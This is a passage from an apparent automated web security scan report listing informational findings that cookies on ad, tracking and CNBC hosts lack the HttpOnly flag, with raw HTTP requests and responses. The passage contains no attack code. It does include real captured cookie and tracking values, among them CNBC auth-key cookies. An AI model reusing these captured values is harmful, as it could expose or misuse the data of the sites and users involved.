Host:	http://sophelle.app5.hubspot.com
Path:	/salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT159=219223212.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: sophelle.app5.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=tnXvN-SJzQEkAAAANDYwNWYxM2EtN2M2MC00YWU2LWFlZTctOTU1OTY4ZTNlZTI00; hubspotutk=9c6ca7a5-ca15-46b9-a6b6-0f57cca70bb6; hsfirstvisit=http%253A%252F%252Fwww.sophelle.com%252F%7c%7c2011-09-04%252010%253A55%253A54

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 575
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 06 Sep 2011 15:27:50 GMT
Set-Cookie: HUBSPOT159=219223212.0.0000; path=/

var hsUse20Servers = true;
var hsDayEndsIn = 45129;
var hsWeekEndsIn = 477129;
var hsMonthEndsIn = 2118729;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-09-06 11:27
...[SNIP]...

13.189. http://statse.webtrendslive.com/dcscnww13100008eg8v7k3x39_3j3x/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/dcscnww13100008eg8v7k3x39_3j3x/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAOAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAADpOZk46TmZOCQAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAAA6TmZOOk5mTgAAAAA-; path=/; expires=Fri, 03-Sep-2021 16:45:46 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcscnww13100008eg8v7k3x39_3j3x/dcs.gif?&dcsdat=1315345545796&dcssip=www.cvs.com&dcsuri=/CVSApp/promoContent/promoLandingTemplate.jsp&dcsqry=%3FpromoLandingId=1350%26WT.mc_id=PS_ECBC_Google&dcsref=http://www.google.com/search%3Fsourceid=chrome%26ie=UTF-8%26q=Direct%2BBeauty%2BProduct&WT.co_f=50.23.123.106-4086325760.30173190&WT.vt_sid=50.23.123.106-4086325760.30173190.1315345545800&WT.vt_f_tlv=0&WT.tz=-5&WT.bh=16&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=CVS%20Beauty%20Club%20ExtraCare%20offer%20deals%20cosmetics%20beauty%20extrabucks%20skincare%20and%20haircare&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1266x909&WT.fi=Yes&WT.fv=10.3&WT.tv=1.1.0&WT.dl=0&WT.es=www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp&WT.cg_s=1350&WT.sp=OTC%3BRx&WT.cg_n=Shared&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&cvs_serverinstance=prd-app-311&authStatus=0&promotion=1350_CVS%2BBeauty%2BClub%2BExtraCare%2Boffer%2Bdeals%2Bcosmetics%2Bbeauty%2Bextrabucks%2Bskincare%2Band%2Bhaircare&ExtraCare=NO HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAANAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOCAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 16:45:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAOAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAACNbZU4jW2VOz0sAAEZMZU7IS2VOwOYAADpOZk46TmZOCQAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAAAjW2VOI1tlTkxNAAA6TmZOOk5mTgAAAAA-; path=/; expires=Fri, 03-Sep-2021 16:45:46 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

13.190. http://t2.trackalyzer.com/trackalyze.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t2.trackalyzer.com
Path:	/trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

loop=http%3A%2F%2Fwww%2Eshopify%2Ecom%2F%3Fgclid%3DCK6YvLv4iKsCFSE8gwod%2DiiK3g; expires=Wed, 07-Sep-2011 07:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio&p=http%3A//www.shopify.com/%3Fgclid%3DCK6YvLv4iKsCFSE8gwod-iiK3g&i=1 HTTP/1.1
Host: t2.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 15:32:01 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t2.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Eshopify%2Ecom%2F%3Fgclid%3DCK6YvLv4iKsCFSE8gwod%2DiiK3g; expires=Wed, 07-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t2.trackalyzer.com/dot.gif">here</a>.</body>

13.191. http://t5.trackalyzer.com/trackalyze.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://t5.trackalyzer.com
Path:	/trackalyze.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

loop=http%3A%2F%2Fwww%2Etenzing%2Ecom%2Fatg%2Decommerce%2Dhosting%2Easp%3Futm%5Fsource%3DPG0008%2DATG%2DSolutions%26utm%5Fcampaign%3D001%26utm%5Fcontent%3D01%26utm%5Fterm%3D%252BATG%2520%252Bsolutions%26utm%5Fmedium%3DPPC; expires=Wed, 07-Sep-2011 07:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /trackalyze.asp?r=http%3A//www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG+e-commerce+solutio&p=http%3A//www.tenzing.com/atg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC&i=18085 HTTP/1.1
Host: t5.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response

HTTP/1.1 302 Object moved
Date: Tue, 06 Sep 2011 15:31:49 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
X-Powered-By: ASP.NET
Location: http://t5.trackalyzer.com/dot.gif
Content-Length: 154
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fwww%2Etenzing%2Ecom%2Fatg%2Decommerce%2Dhosting%2Easp%3Futm%5Fsource%3DPG0008%2DATG%2DSolutions%26utm%5Fcampaign%3D001%26utm%5Fcontent%3D01%26utm%5Fterm%3D%252BATG%2520%252Bsolutions%26utm%5Fmedium%3DPPC; expires=Wed, 07-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t5.trackalyzer.com/dot.gif">here</a>.</body>

13.192. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/300x250/atf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; meld_sess=195abe93-22fe-4e4f-a868-b360cd60e32b

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1157
Content-Type: text/html
Date: Tue, 06 Sep 2011 14:57:04 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:300px;height:250px;margin:0;border:0">

...[SNIP]...

13.193. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/677/cnbc/728x90/atf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: admeld_opt_out=true; meld_sess=195abe93-22fe-4e4f-a868-b360cd60e32b

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="PSAo PSDo OUR SAM OTR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 1147
Content-Type: text/html
Date: Tue, 06 Sep 2011 14:57:38 GMT
Connection: close
Set-Cookie: D41U=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.tag.admeld.com

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">

<div style="width:728px;height:90px;margin:0;border:0">

...[SNIP]...

13.194. http://tags.bluekai.com/site/3834 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/3834

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bk=noTeVCDC+h5Mq/0A; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com
bkc=KJh5NWN/PaWDOded4KdBCeBMU2HYoSeJ7/u1/GJYZ5aaCx+4xHCukG+CUnHNTzRGvOske0M/Hul5ODV/+R7WYP3tzaa1RnVRwixUqx/q0eg7pjp7wH4ZpK1cdlmdlgtl+CVTUesT4Uy6B9O38YccQ0AGeyKqf3974ytRLUyCoElGZmFaiHl9RLge7d8ufs2PGlyLoXlNTAdqQRBBcr8NkAvFT5T6keAF7iswgH71qCEeJB8sFr3TXkwfxzJEqFsNQbgm7pZQp4lqU3ctrdTPxh2F/72+2m4eG/7VbrPLwzdpR0d5Ne82x8F4TMn2wVLaOkqw67yUMgv4mrqhiJ2xd4yXzsgiDkEwfofD8gpTa3l+mLllH4+9fm2q+WBbqcm2IJ6w2Wye5XCKyIBU+eIz6a8twcJWINYq53aaZdrlEqdRFlCF6dQgZ4gTtw8FvJ2nSlBfTrLJVGXCsgwkADOftwn6B+owbyqFnDX8EkSNLTflmKqthj2ozLZEyWUydcjaeChpUk0Adq5D1li1KMNfd0iDmudKAysStypZcFUcEMFZFcCF12675O8K8yr6F0rftV+6Y5MZFciuI++J8IFXXfbG7gN/btIqXIJU2etY1gYxbT62k5UZFnC1pkYIrNY/7D2gzNbXuFlB64tun4UWwr0RXIvdBwXFsyRdmMS2zkKfBSK2lvf5HI4eBgzF4+MT4Fzd5GjWd95p2O71; expires=Sun, 04-Mar-2012 15:00:28 GMT; path=/; domain=.bluekai.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.195. http://tenzing.fmpub.net/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tenzing.fmpub.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

vuid=1e26f8d5f332f1261c9af6b2d31021eb; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /?t=z&n=4479&keywords=business|electroniccommerce|gatewayinc|ibmcorp|&fleur_de_sel=1936597090680152 HTTP/1.1
Host: tenzing.fmpub.net
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ltuid=1e26f8d5f332f1261c9af6b2d31021eb; vuid=1e26f8d5f332f1261c9af6b2d31021eb

Response

HTTP/1.0 204 No Content
Date: Tue, 06 Sep 2011 15:32:43 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.3.4
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: vuid=1e26f8d5f332f1261c9af6b2d31021eb; expires=Wed, 09-Sep-2015 22:43:06 GMT; path=/
Content-Length: 0
X-Server: adserver5.tor.fmpub.net
Connection: close
Content-Type: application/x-javascript

13.196. http://ticker.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ticker.cnbc.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pers_cookie_insert_prod_ticker_srvrs_80=532795968.20480.0000; expires=Tue, 06-Sep-2011 18:05:59 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: ticker.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Last-Modified: Mon, 04 Dec 2006 02:08:57 GMT
ETag: "32-423bdd50c8040"
Accept-Ranges: bytes
Content-Length: 50
Content-Type: text/html
Expires: Tue, 06 Sep 2011 15:05:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Sep 2011 15:05:59 GMT
Connection: close
Set-Cookie: pers_cookie_insert_prod_ticker_srvrs_80=532795968.20480.0000; expires=Tue, 06-Sep-2011 18:05:59 GMT; path=/

<script>
window.location="/main.do";
</script>

13.197. http://www.actonsoftware.com/acton/bn/1227/visitor.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.actonsoftware.com
Path:	/acton/bn/1227/visitor.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

wp1227=UVVADDDDDDTKKMZM; Domain=.actonsoftware.com; Expires=Wed, 05-Sep-2012 15:32:50 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.198. http://www.bizographics.com/collect/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bizographics.com
Path:	/collect/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BizographicsOptOut=OPT_OUT; Domain=.bizographics.com; Expires=Sun, 04-Sep-2016 15:33:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.199. http://www.cnbc.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e088dnyD6ChwJv%2bxcg%2f2dGRjw%3d; path=/
cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7F4yDjO9qOD9M=; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&source=(The%20Associated%20Press%20OR%20Reuters%20OR%20AFX%20OR%20The%20New%20York%20Times%20OR%20CNBC.COM)&layout=NoPic&pubtime=0&pubfreq=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zce56gUZZEw56g4QDxJdQx%2fwgxtDBNooSLeqlBQuP1n34%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FqHt53A9BlIs=; TZM=-300; adops_master_kvs=; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; s_cc=true; xaikeeperua=yes; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

13.200. http://www.cnbc.com/id/15837856 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/15837856

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc0N7KqRL%2blH5LCT1%2b0Uh3ks%3d; path=/
cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FgJb8gYY6CB4=; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/15837856 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&layout=blogpost&pubtime=0&pubfreq=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; adops_master_kvs=; xaikeeperua=yes; s_cc=true; __qseg=Q_D; s_nr=1315339051482; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856%2526ot%253DA

Response

13.201. http://www.cnbc.com/id/15837856/site/14081545/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/15837856/site/14081545/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcBpSz0sIifbhEQkGsO3tDc1WB3hEycGiKfIKA9zI8x%2fY%3d; path=/
cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FI8/GrL59R8o=; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/15837856/site/14081545/ HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?keywords=xss&sort=date&minimumrelevance=0.2&layout=blogpost&pubtime=0&pubfreq=h
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TZM=-300; __qca=P0-1380789371-1315338919989; snas_noinfo=1; cnbc_regional_cookie=US; cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zcZRSv7js4augxEbn8T3e084iWrP3zZjGLW8rjUsginb4%3d; cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7FjEBYL11GHn8=; adops_master_kvs=; xaikeeperua=yes; s_cc=true; __qseg=Q_D; s_nr=1315339052241; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CBlog%25257CAllT%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cnbc.com/id/15837856/site/14081545/%2526ot%253DA

Response

13.202. http://www.cnbc.com/id/15838394 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cnbc.com
Path:	/id/15838394

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cnbcQuotesAuthKeyCookie=zggoj%2fSMA81IBBiO%2ftj4ZOPFE9V8U546ltXzAtm78W9XnroyqktUvBZcjpSrj8zc%2fY5ELdAENHOFxpoh%2bgPqkAQHkPk0lP1hvqCaED0yuYg%3d; path=/
cnbcChartAuthKeyCookie=YYY330_VnsGsd2sggPqXYH+RDnPSbmBVfKS+D7Fcf9Uq9kjbM8=; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /id/15838394 HTTP/1.1
Host: www.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/15837856/site/14081545/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
